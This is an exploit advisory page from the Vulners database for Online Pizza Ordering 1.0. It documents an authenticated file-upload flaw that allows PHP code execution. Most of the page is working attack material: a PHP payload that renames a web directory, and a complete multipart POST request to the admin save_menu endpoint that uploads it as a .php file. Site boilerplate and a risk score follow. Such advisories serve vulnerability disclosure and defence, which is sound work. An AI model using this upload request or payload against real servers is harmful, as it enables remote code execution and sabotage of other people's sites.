Vulners
Lucene search
Online Pizza Ordering 1.0 Shell Upload
`## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
[+]Injection_REQUEST:
```POST
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1
Host: pwnedhost7.com
Content-Length: 1050
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111
Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX
Origin: http://pwnedhost7.com
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p
Connection: close
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="name"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="description"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="status"
on
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="price"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="img"; filename="namebasterd.php"
Content-Type: application/octet-stream
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
------WebKitFormBoundaryt8ceBsdqMkRKDoHX--
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8